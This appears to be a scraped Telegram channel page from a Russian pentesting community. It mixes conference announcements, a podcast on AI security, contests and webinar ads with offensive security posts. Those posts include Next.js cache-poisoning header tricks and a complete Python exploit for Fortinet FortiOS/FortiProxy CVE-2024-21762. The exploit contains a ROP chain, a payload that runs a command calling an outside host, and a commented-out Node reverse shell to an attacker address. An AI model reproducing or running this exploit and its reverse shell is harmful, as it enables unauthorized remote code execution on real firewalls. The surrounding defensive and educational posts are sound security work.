Похек – Telegram
Похек
16.2K subscribers
2.08K photos
110 videos
243 files
3.05K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @PoxekAds_bot или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
Forwarded from Pentest HaT (Андрей (Exited3n))
Please open Telegram to view this post
VIEW IN TELEGRAM
Осталось всего несколько часов до закрытия Call Of Papers на Pentest Award.
Я уже подал :)
Жду ваших работ ;)

➡️ https://award.awillix.ru/

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
😁102
Forwarded from Just Security
This media is not supported in your browser
VIEW IN TELEGRAM
Друзья, в связи с тем, что за выходные нам поступило большое количество просьб о продлении срока приема заявок, мы решили отложить его до 14 июля. 🔛

Во многом это обусловлено долгим согласованием участников частичного раскрытия NDA. Тем, кому удалось вовремя отправить заявки, начислим дополнительный балл в попытке восстановить справедливость.

Сроки окончательные, и других переносов не будет, так как жюри нужно достаточно времени для прочтения всех работ. Намекаем, что наименьшая конкуренция сейчас в номинации «Ловись рыбка: за самый оригинальный фишинг или попытку засоциалить сотрудников», поэтому не стесняйтесь отправлять работы по этой теме, возможно именно вы победите.

Уже сейчас можно сказать, что качество работ выросло в сравнении с прошлым годом, а значит, мы еще больше приблизились к общей цели, с которой создавался Pentest award — развитие сообщества этичного хакинга. 

Не терпится увидеть вас на награждении!
https://award.awillix.ru/

@justsecurity
Please open Telegram to view this post
VIEW IN TELEGRAM
8
ChatGPT 10 - будущий Скайнет ?! Артем Семенов - PWN AI
#подкаст #pwnai

❗️ Буду краток, вышел второй выпуск 🌚 Poxek Podcast 🕺

У него в гостях - Артем Семёнов, основатель PWN AI. PWN AI (пывнэйай) - это телеграм канал, в котором Вы познаете (нет нет - не буддизм), как можно применить ИИ в нашей нелёгкой работе безопасника, а также много почитать об угрозах и проблемах безопасности этого самого ИИ.

➡️Подкаст будет интересен
Специалистам по кибербезопасности
Владельцам бизнеса
Всем, кто хочет узнать больше о применении нейросетей, LLM и машинного обучения в работе и для собственных нужд

➡️В этом подкасте мы обсудили
Кибербезопасность: актуальные угрозы ИИ, ИИ в ИБ, ИБ в ИИ.
Red Team: как взламывают нейросети, LLM
Red Team: как нейросети и LLM взламывают сайты и IT инфраструктуру.
PWN AI: представление канала, чем славится и почему стоит подписаться :)
Исследования: Разработчики нейросетей понимают, как работает их же продукт?!

➡️ Ссылки
📹 YouTube
😻 Mave
🎵 Яндекс Подкаст
❤️ PWN AI

Обязательно смотрите до конца!

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥183😁2👾21
Forwarded from OFFZONE
This media is not supported in your browser
VIEW IN TELEGRAM
®️ Запускаем call for papers!

Пятый OFFZONE пройдет 22–23 августа в Москве, в Культурном центре ЗИЛ.

В этом году у нас еще больше зон для выступлений: добавились AI.Zone и Threat.Zone.
Ждем доклады на самые разные темы: open-source, применение AI/ML в кибербезопасности, уязвимости в парсерах, пентест Wi-Fi и не только. Не бойтесь предложить что-то свое :)

Спикеры, которые пройдут отбор, получат: бесплатные проходки на конфу и Speaker party, наш мерч, а также другие плюшки в зависимости от зоны.

Присылайте заявки на доклады до 12 июля. 

Узнать больше и подать заявку
Please open Telegram to view this post
VIEW IN TELEGRAM
13
Отравление кеша. Разбираемся с кешированием страниц и атаками на него
#webpentest

От­равле­ние кеша (cache poisoning) — это вид ата­ки, при котором ата­кующий вно­сит в кеш сис­темы некор­рек­тные дан­ные. Ког­да сис­тема пыта­ется их исполь­зовать, это при­водит к проб­лемам: от наруше­ния работы до ком­про­мета­ции дан­ных. В этой статье я покажу отравле­ние кеша на при­мере реаль­ной уяз­вимос­ти в движ­ке сай­та, а так­же раз­берем­ся c HTTP-заголов­ками, которые пре­пятс­тву­ют этой ата­ке.

🔓 Читать далее

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
133
Forwarded from SHADOW:Group
💀 Про Next.js и отравление кэша

1️⃣ При извлечении данных для страниц SSR (рендеринга на стороне сервера) добавление заголовка x-middleware-prefetch приводит к получению пустого объекта JSON {} в качестве ответа. При наличии CDN или системы кэширования этот пустой ответ потенциально может быть кэширован, в зависимости от конфигурации правил кэширования, что делает целевую страницу непрактичной, а ее содержимое недоступным и получается некая разновидность DOS'а через отравление кэша.

2️⃣ Использование React Component Server (RSC) и отправка заголовка Rsc: 1, может привести к отравлению кэша и вернет RSC React вместо исходного содержимого. Успешность также зависит от CDN и его правил кэширования.

3️⃣ При определенных условиях можно перезаписать код состояния через значение заголовка x-invoke-status, непосредственно указанного в запросе и вызвать/вернуть страницу ошибки. Как правило, CDN и системы кэширования настроены так, чтобы не кэшировать коды ошибок HTTP. Однако можно указать код 200 для согласования с правилами кэширования и эффективно “принудительно” кэшировать страницу с ошибкой.

Более подробно про каждый из способов, а также некоторые советы как нафармить денег при общении с триажерами доступны в оригинальном ресерче по ссылке.

#web #cache #dos
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
8😁3
Конкурс проходок на 🕐🕑🕒🕓🕔🕕🕖
#offzone2024 #конкурс

➡️Конкурс на 2 проходки на OFFZONE

➡️Условия: сделать самый оригинальный, смешной, не токсичный мем про OFFZONE
➡️Сроки: 2 недели с момента выхода поста
➡️Условия оценки: наибольшее кол-во положительных реакций на сообщении и если будет сложная борьба, то моё мнение и @fun9ral.


➡️ Условия участия: 1 мем = 1 сообщение с тегом #offzone2024
Условие обязательное, не будете следить, не будете участвовать.

Также у OFFZONE есть свой канал. Там и новости выходят о мероприятии, а также каждый год ребята крафтят крутые хардварные бейджы)

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13😁54👾1
Forwarded from Mobile AppSec World (Yury Shabalin)
Как построить процесс безопасной разработки и не сойти с ума

Всем привет!

Буквально через 10 минут пообщаемся с очень уважаемыми и умными людьми на тему процессов безопасной разработки!

Уверен, будет интересно)

Если интересно, подключайтесь!
Forwarded from Mobile AppSec World (Yury Shabalin)
Персональные данные и мобильные приложения, как они связаны?

Всем привет!

Я наконец выплыл из отпуска и возвращаюсь в рабочее русло 😄

И на повестке дня сегодня не что иное, как персональные данные и их утечки.
Меня очень давно интересовал этот вопрос, можно ли считать хранение или утечку ПДн через мобилку на самом деле утечкой, чем это может грозить и вообще, что же такое мобильное приложение с точки зрения нашего законодательства?

Я потратил достаточно много времени и экспертизой своих коллег чтобы разобраться в этом вопросе и вот результат - статья на Хабр.

Как мне кажется получилось достаточно неплохо, по крайней мере для себя я определился и с понятиями ПДн в мобилках и с определением приложений вообще в законах. Надеюсь, вам тоже это будет интересно. Особенно, учитывая, что сейчас на рассмотрении закон о введении оборотных штрафов для компаний, допустивших утечки.

Приятного чтения!

#habr #ПДн
🔥4👾3
Fortinet FortiOS & FortiProxy Unauthorized RCE CVE-2024-21762
#RCE #CVE #Fortinet #FortiOS #FortiProxy

CVE-2024-21762 представляет собой уязвимость записи за границы буфера (buffer overflow) в Fortinet FortiOS и FortiProxy. Эта уязвимость позволяет неавторизованному атакующему выполнять произвольный код с помощью специально сформированных HTTP-запросов.

➡️Атакуемые продукты:
- FortiOS
- FortiProxy

Эксплойт:
import socket
import time
import argparse


TARGET = 'xxxxxxxxxxxx' # Target IP
PORT = 443 # Target port, usually 443 for SSL VPN

def make_sock(target, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, port))
return sock

def send_payload(payload, target, port):
with make_sock(target, port) as ssock:
ssock.sendall(payload)

def main():
ssl_do_handshake_ptr = b"%60%ce%42%00%00%00%00%00"
getcwd_ptr = b"%70%62%2c%04%00%00%00%00"

pivot_1 = b"%52%f7%fd%00%00%00%00%00" # push rdi; pop rsp; ret;
pivot_2 = b"%ac%c9%ab%02%00%00%00%00" # add rsp, 0x2a0; pop rbx; pop r12; pop rbp; ret;

rop = b""
rop += b"%c6%e2%46%00%00%00%00%00" # push rdi; pop rax; ret;
rop += b"%19%6f%4d%01%00%00%00%00" # sub rax, 0x2c8; ret;
rop += b"%8e%b2%fe%01%00%00%00%00" # add rax, 0x10; ret;
rop += b"%63%db%ae%02%00%00%00%00" # pop rcx; ret;
rop += b"%00%00%00%00%00%00%00%00" # zero rcx
rop += b"%38%ad%98%02%00%00%00%00" # or rcx, rax; setne al; movzx eax, al; ret;

rop += b"%c6%52%86%02%00%00%00%00" # shl rax, 4; add rax, rdx; ret;
rop += b"%6e%d0%3f%01%00%00%00%00" # or rdx, rcx; ret; - rdx is zero so this is a copy
rop += b"%a4%df%98%02%00%00%00%00" # sub rdx, rax; mov rax, rdx; ret;

rop += b"%f5%2c%e6%00%00%00%00%00" # sub rax, 0x10; ret;
rop += b"%e4%e6%d7%01%00%00%00%00" # add rsi, rax; mov [rdi+8], rsi; ret;

rop += b"%10%1b%0a%01%00%00%00%00" # push rax; pop rdi; add eax, 0x5d5c415b; ret;
rop += b"%25%0f%8d%02%00%00%00%00" # pop r8; ret; 0x028d0f25
rop += b"%00%00%00%00%00%00%00%00" # r8

pivot_3 = b"%e0%3f%4d%02%00%00%00%00" # add rsp, 0xd90; pop rbx; pop r12; pop rbp; ret;

call_execl = b"%80%c1%43%00%00%00%00%00"

bin_node = b"/bin/node%00"
e_flag = b"-e%00"
## use this one for rev shell b'(function(){var net%3drequire("net"),cp%3drequire("child_process"),sh%3dcp.spawn("/bin/node",["-i"]);var client%3dnew net.Socket();client.connect(1337,"xxxxxxxxxxx",function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});return /a/;})();%00'
js_payload = b'(function(){var cp=require("child_process");cp.execSync("nslookup xxxxxxxxxxx.oastify.com");})();%00'

form_value = b""
form_value += b"B"*11 + bin_node + b"B"*6 + e_flag + b"B"*14 + js_payload
form_value += b"B"*438 + pivot_2 + getcwd_ptr
form_value += b"B"*32 + pivot_1
form_value += b"B"*168 + call_execl
form_value += b"B"*432 + ssl_do_handshake_ptr
form_value += b"B"*32 + rop + pivot_3
body = (b"B"*1808 + b"=" + form_value + b"&")*20

data = b"POST /remote/hostcheck_validate HTTP/1.1\r\n"
data += b"Host: " + TARGET.encode() + b"\r\n"
data += b"Content-Length: " + str(len(body)).encode() + b"\r\n"
data += b"\r\n"
data += body

send_payload(data, TARGET, PORT)

# Short delay to ensure the server processes the first request
time.sleep(2)

# Preparing and sending the second part of the exploit
data = b"POST / HTTP/1.1\r\n"
data += b"Host: " + TARGET.encode() + b"\r\n"
data += b"Transfer-Encoding: chunked\r\n"
data += b"\r\n"
data += b"0"*4137 + b"\0"
data += b"A"*1 + b"\r\n\r\n"

send_payload(data, TARGET, PORT)

if __name__ == "__main__":
main()


Подробные ресерчи можете найти ТУТ, ТУТ, ТУТ

Скрипт для проверки безопасности вашего сервера
https://github.com/BishopFox/cve-2024-21762-check

git clone https://github.com/BishopFox/cve-2024-21762-check; cd cve-2024-21762-check; python3 check-cve-2024-21762.py <host> <port>



🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
137👾3😁2
Похек
Обновление по конкурсу: Добавляю ещё один приз! Каждому победителю, я лично подарю футболку Похек на OFFZONE. Как вам такое?) Дизайн/цвет сможете выбрать сами
Раз народ просит больше футболок на розыгрыш. То надо дать больше футболок!

➡️2 мема - 2 проходки - 2 футболки
➡️3 мема, не ставших победителей, но с не менее годными мемами - 3 футболки

➡️Обязательное условие, вы должны приехать на мероприятие и я отдам в руки. Доставку не делаю в рамках этого конкурса

P.S. не забывайте ставить #offzone2024, иначе участие не засчитывается
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥123🌚1
Forwarded from KazDevOps
☄️ Наш вебинар «Serverless: трюки и советы на практике» совместно с Yandex Cloud стал еще интереснее!

Напоминаем, что 16 июля в 19:00 по Алматы состоится бесплатный вебинар. Вы погрузитесь в Serverless и на практике узнаете возможности бессерверной архитектуры.

🚩 Мы добавили в программу еще одного спикера — СОО Core 24/7 Александра Калинина. Саша расскажет про миграцию в облако на реальном кейсе. Какие были сложности, как их преодолели и что получил клиент в результате.


Будет интересно всем, кто занимается cloud migration или планирует делать это в будущем 💪

Также в программе:

Yandex Cloud в Казахстане.
Serverless подход к архитектуре.
Способы применения Serverless: для чего подходит, а для чего не годится.

👉 Регистрируйтесь здесь

Этот вебинар для техлидов, СТО, DevOps специалистов и руководителей IT бизнеса, которые хотят оценить необходимость в cloud migration и оптимизировать этот процесс, узнать об альтернативах, улучшить управление данными.


Зовите коллег, начальников и приходите сами. До встречи 🤝

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2
Мы готовим кое-что особенное в августе, но что именно, пока секрет 🎁

Среди всех, кто в течение июля принесёт >=1 валидный баг любого нашего сервиса, мы разыграем кое-что интересное. Что именно это будет, узнаете совсем скоро, а пока…

Удачной охоты! ⚡️
Please open Telegram to view this post
VIEW IN TELEGRAM
😁7🔥1